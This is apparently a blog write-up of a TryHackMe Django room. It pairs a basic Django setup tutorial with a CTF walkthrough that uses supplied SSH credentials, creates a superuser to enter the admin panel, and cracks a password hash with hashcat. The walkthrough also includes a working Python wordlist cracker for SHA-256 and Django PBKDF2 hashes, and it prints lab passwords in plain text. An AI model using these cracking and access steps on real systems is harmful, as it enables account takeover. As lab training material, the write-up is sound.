<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983509005/c030c7fa-5bc2-4216-9f8f-5baa7621279c.png" alt="Introduction to Django Framework" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983510075/94ebda9c-d30a-47e4-85a5-f12a6ce8379d.png" alt="Introduction to Django Framework" /></p>
<p><strong>createsuperuser</strong></p>
<p>This command allows you to create an admin account for your Django web admin panel.</p>
<p>    ┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec]
    └─# python3 manage.py createsuperuser</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983511168/4edaf6f1-092e-4d39-978a-5230d93fdbfb.png" alt="Introduction to Django Framework" /></p>
<p><strong>Django Admin Panel</strong></p>
<p><code>http://127.0.0.1:8000/admin/</code><br />The Django web admin panel lives under <code>/admin/</code> on whatever address you bound <code>runserver</code> to.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983512164/eb655524-cb1e-459a-9d4a-2f645003b536.png" alt="Introduction to Django Framework" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983513189/277a92ae-c7af-417f-afc7-0662ec7434be.png" alt="Introduction to Django Framework" /></p>
<p><strong>startapp</strong></p>
<p><code>startapp</code> initialises an app inside your project. A Django project can contain any number of apps.</p>
<p>    ┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec]
    └─# python3 manage.py startapp slatt</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983514219/617a6b75-d6d9-4cda-8753-629258f7b57c.png" alt="Introduction to Django Framework" /></p>
<hr />
<h2 id="heading-creating-a-site">Creating a Site</h2>
<p>Let's go ahead and create a very simple app.</p>
<h3 id="heading-modify-settingspy">Modify settings.py</h3>
<p>    INSTALLED_APPS = [
        'slatt',
        'django.contrib.admin',
        'django.contrib.auth',
        'django.contrib.contenttypes',
        'django.contrib.sessions',
        'django.contrib.messages',
        'django.contrib.staticfiles',
    ]</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983515233/93fb7889-7be4-4cef-a6d6-14b6a480afeb.png" alt="Introduction to Django Framework" /></p>
<h3 id="heading-modify-urlspy">Modify urls.py</h3>
<p>    from django.contrib import admin
    from django.urls import path, include</p>
<p>    urlpatterns = [
        path('slatt/', include('slatt.urls')),
        path('admin/', admin.site.urls),
    ]</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983516397/bc614962-ff0a-437a-9860-687831927cb9.png" alt="Introduction to Django Framework" /></p>
<h3 id="heading-app-directory">App Directory</h3>
<p>There are a couple files that need to be created in here for the app to work!</p>
<p><strong>urls.py</strong></p>
<p>    from django.urls import path
    from . import views</p>
<p>    app_name = 'slatt'
    urlpatterns = [
        path('', views.index, name='index'),
    ]</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983517685/8765fc2d-2667-43b5-b7e8-7faa78a8f5ef.png" alt="Introduction to Django Framework" /></p>
<p><strong>views.py</strong></p>
<p>    from django.shortcuts import render
    from django.http import HttpResponse</p>
<p>    # Create your views here.
    def index(request):
        return HttpResponse("Hello, World!")</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983518693/a53be809-fd9c-4580-8465-54732c9b3365.png" alt="Introduction to Django Framework" /></p>
<p><strong>Running App</strong></p>
<p>    ┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec]
    └─# python3 manage.py migrate</p>
<p>    ┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec]
    └─# python3 manage.py runserver 0.0.0.0:8000</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983519753/e5320dff-95f4-4ddb-bbe0-14c2642e56c0.png" alt="Introduction to Django Framework" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983520768/e43bf022-34dd-4a40-a6df-212af7c170ba.png" alt="Introduction to Django Framework" /></p>
<h3 id="heading-rendering-templates-with-django">Rendering Templates with Django</h3>
<p>Django can generate the HTML markup for you if you tell it how; that is what templates are for. Variables rendered with <code>{{ }}</code> are HTML-escaped by default, which is the main reason Django templates resist XSS; that protection is only lost where a developer explicitly marks output as safe.</p>
<p><strong>Templates</strong></p>
<p>Create a <code>templates</code> subdirectory in the app directory to hold all of our templates. The name matters: with the default <code>APP_DIRS = True</code> in <code>settings.py</code>, Django's loader only looks for a directory called <code>templates</code> inside each installed app.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983521548/6a6f1a4f-5471-44cc-abe0-bfb2207b81e4.png" alt="Introduction to Django Framework" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983522372/b173ec63-9f9b-426b-973f-fad48959feb5.png" alt="Introduction to Django Framework" /></p>
<p><strong>Base.html</strong></p>
<p>    &lt;!DOCTYPE html&gt;
    &lt;html&gt;
    &lt;head&gt;
        &lt;title&gt;{% block title %}Slatt{% endblock %}&lt;/title&gt;
    &lt;/head&gt;
    &lt;body&gt;
        {% block content %} {% endblock %}
    &lt;/body&gt;
    &lt;/html&gt;</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983524206/9cbc4121-d37f-43a2-b0c4-1ee83caadf02.png" alt="Introduction to Django Framework" /></p>
<p><strong>index.html</strong></p>
<p>    {% extends 'base.html'%}</p>
<p>    {% block content %}</p>
<p>    Hello world!
    -Nee!</p>
<p>    {% endblock %}</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983525247/46676e95-63eb-4313-936c-75b6b52af339.png" alt="Introduction to Django Framework" /></p>
<p><strong>views.py</strong></p>
<p>    from django.shortcuts import render
    from django.http import HttpResponse</p>
<p>    # Create your views here.
    def index(request):
        return render(request, 'index.html')</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983526312/f8d682c2-be91-4470-b83a-41cea7fbaf3d.png" alt="Introduction to Django Framework" /></p>
<p><strong>Running App</strong></p>
<p>    ┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec]
    └─# python3 manage.py migrate</p>
<p>    ┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec]
    └─# python3 manage.py runserver 0.0.0.0:8000</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983527368/f937243f-250d-4aee-9277-fce534d9d568.png" alt="Introduction to Django Framework" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983528427/419d66e0-0861-4bac-8372-9e85528a0d41.png" alt="Introduction to Django Framework" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983529851/0d87df32-76df-4ea9-9b2e-ae2a99edcd44.png" alt="Introduction to Django Framework" /></p>
<hr />
<h2 id="heading-ctf">CTF</h2>
<p><code>Target host = 10.10.131.20</code><br /><code>Target Port = 8000</code><br /><code>Target Username = django-admin</code><br /><code>Target Password = roottoor1212</code></p>
<p>Browsing to the host on that port returned Django's <code>DisallowedHost</code> error (Invalid HTTP_HOST header), meaning the address I was using was not in the application's <code>ALLOWED_HOSTS</code>, as shown below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983531165/fcad41b9-e2d6-4a3a-b3a8-f5a3c1dc5f7b.png" alt="Introduction to Django Framework" /></p>
<p>I was able to log in to the server via SSH with the given credentials.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983532316/ce9f139f-b678-44be-8610-9ac5145be5cf.png" alt="Introduction to Django Framework" /></p>
<p>Since I had access to the server, I modified the <code>ALLOWED_HOSTS</code> list in <code>settings.py</code></p>
<p>    django-admin@py:~/messagebox/messagebox$ nano settings.py</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983533469/63338715-efb4-4935-a61b-479a18b66ee3.png" alt="Introduction to Django Framework" /></p>
<p>That modification led me into the application as shown below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983534476/9eac9d84-641c-489c-9b13-511ee359d219.png" alt="Introduction to Django Framework" /></p>
<p>Exploring messages returned the following.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983536201/1ea0b46d-9e93-4c2f-b1fd-94d1b896c47a.png" alt="Introduction to Django Framework" /></p>
<blockquote>
<p>Admin panel flag?</p>
</blockquote>
<p>Since I had shell access to the server, I used the <code>createsuperuser</code> command to create my own account so I could log in to the admin panel.</p>
<p>    django-admin@py:~/messagebox$ python3 manage.py createsuperuser</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983537435/fb328a4d-00f7-461c-baaa-acdd21d47be9.png" alt="Introduction to Django Framework" /></p>
<p><code>http://10.10.131.20:8000/admin/</code></p>
<p>With that, I was able to log in to the admin panel as shown below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983538512/0898df9a-30cf-4563-8d79-3fbe8efe9153.png" alt="Introduction to Django Framework" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983539795/0e965300-76ff-42de-b53d-697728587ab8.png" alt="Introduction to Django Framework" /></p>
<p>Browsing to <a target="_blank" href="http://10.10.131.20:8000/admin/auth/user/"><code>http://10.10.131.20:8000/admin/auth/user/</code></a> reveals the flag and some other interesting information as shown below!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983541040/f2f89b6c-cf32-4f30-84b3-8efeacfe702d.png" alt="Introduction to Django Framework" /></p>
<blockquote>
<p>User flag?</p>
</blockquote>
<p>The previous challenge gave us a new username and a password hash.</p>
<p>    Username: StrangeFox<br />    Password hash: https://pastebin.com/nmK---</p>
<p>Using <a target="_blank" href="https://toolz.4pfsec.com/hashId/"><code>https://toolz.4pfsec.com/hashId/</code></a> I was able to detect the hash as shown below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983542388/088af3de-72ef-4903-80a0-0245c09bf63b.png" alt="Introduction to Django Framework" /></p>
<p><code>SHA-256 [Hashcat Mode: 1400]</code></p>
<p>Since I knew it was a <code>SHA-256</code> hash, I used <code>hashcat mode 1400</code> to crack it. Note that this is a raw, unsalted SHA-256 digest. Passwords Django itself stores in <code>auth_user.password</code> look like <code>pbkdf2_sha256$&lt;iterations&gt;$&lt;salt&gt;$&lt;digest&gt;</code> and need hashcat mode 10000, at a far higher cost per guess.</p>
<p>    .\hashcat.exe -m 1400 .\hashes\djangoCtf.txt .\wordlists\mylist.txt --force</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983543511/7daa789a-108c-4cf8-ac14-a9edb3d7f418.png" alt="Introduction to Django Framework" /></p>
<p><code>c06029563b2765020613f5bf79fc528344ffa039ef1483d0c390786d8010c630:WildNature</code><br /><code>Target User = StrangeFox</code><br /><code>Target User's Password = WildNature</code></p>
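<p>As an added example (not hashcat, and not code from the room), here is a Python wordlist attack that handles both hash shapes you meet on a Django host: a raw SHA-256 hex digest like the one above, and Django's stored <code>pbkdf2_sha256$iterations$salt$digest</code> format, which it rebuilds with <code>hashlib.pbkdf2_hmac</code> exactly as <code>django.contrib.auth</code> does. The wordlist and the PBKDF2 sample hash are constructed inline; the sample's iteration count is deliberately tiny so the demo runs instantly, whereas Django 2.2 uses 150,000.</p>

```python
"""Wordlist attack covering a raw SHA-256 hex digest and Django's stored
pbkdf2_sha256 password format. Added example; the wordlist and the PBKDF2
sample hash are constructed inline."""
import base64
import hashlib


def sha256_hex(password):
    """Unsalted SHA-256 of the password, hex encoded (hashcat mode 1400)."""
    return hashlib.sha256(password.encode()).hexdigest()


def django_pbkdf2(password, salt, iterations):
    """Encode a password the way django.contrib.auth's PBKDF2PasswordHasher stores it
    (hashcat mode 10000): algorithm, iterations, salt and base64 digest joined by '$'."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt, base64.b64encode(dk).decode())


def crack(target, wordlist):
    """Return the first wordlist entry that reproduces `target`, or None.
    The hash format is picked from the target's shape."""
    target = target.strip()
    if target.startswith("pbkdf2_sha256$"):
        _alg, iters, salt, _digest = target.split("$", 3)
        iterations = int(iters)
        matches = lambda pw: django_pbkdf2(pw, salt, iterations) == target
    elif len(target) == 64 and all(c in "0123456789abcdef" for c in target.lower()):
        target = target.lower()
        matches = lambda pw: sha256_hex(pw) == target
    else:
        raise ValueError("unsupported hash format: " + target[:20])
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")      # tolerate lines read straight from a file
        if matches(candidate):
            return candidate
    return None


# Constructed wordlist; the walkthrough's own list is not on the page.
WORDLIST = ["password", "roottoor1212", "WildNature", "django", "admin123"]

# The raw SHA-256 from the write-up above.
PAGE_HASH = "c06029563b2765020613f5bf79fc528344ffa039ef1483d0c390786d8010c630"

# Constructed Django-format hash. 1000 iterations keeps the demo instant;
# Django 2.2 defaults to 150000, which is why mode 10000 is so much slower than 1400.
DJANGO_SAMPLE = django_pbkdf2("WildNature", "saltsalt", 1000)

if __name__ == "__main__":
    print("raw sha256  :", crack(PAGE_HASH, WORDLIST))
    print("django hash :", crack(DJANGO_SAMPLE, WORDLIST))
```

<p>The per-guess cost difference is the whole point of PBKDF2: the raw digest falls to a single <code>hashlib.sha256</code> call per candidate, while the Django format costs 150,000 HMAC rounds per candidate at the 2.2 default, so a wordlist that is instant against mode 1400 can take hours against mode 10000.</p>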
<p>Knowing the credentials, I switched to that user.</p>
<p>    su StrangeFox
    WildNature</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983544671/49373955-d5f7-407b-a286-807ccabc0b77.png" alt="Introduction to Django Framework" /></p>
<blockquote>
<p>Hidden flag?</p>
</blockquote>
<p>Knowing the flag would be somewhere on the machine, I grepped recursively through the filesystem for the flag prefix (as shown below).</p>
<p>    StrangeFox@py:/$ cd /
    StrangeFox@py:/$ grep -Hr "THM{"</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983545864/4f8a6bc3-4763-454c-83df-aa665e0863a8.png" alt="Introduction to Django Framework" /></p>
<hr />
<h2 id="heading-conclusion">Conclusion</h2>
<p>With that, this room taught me the basics of Django and where developers' deployment mistakes give a tester a way in. Hope it helped you in some way 😏!</p>
<hr />
]]></content:encoded></item></channel></rss>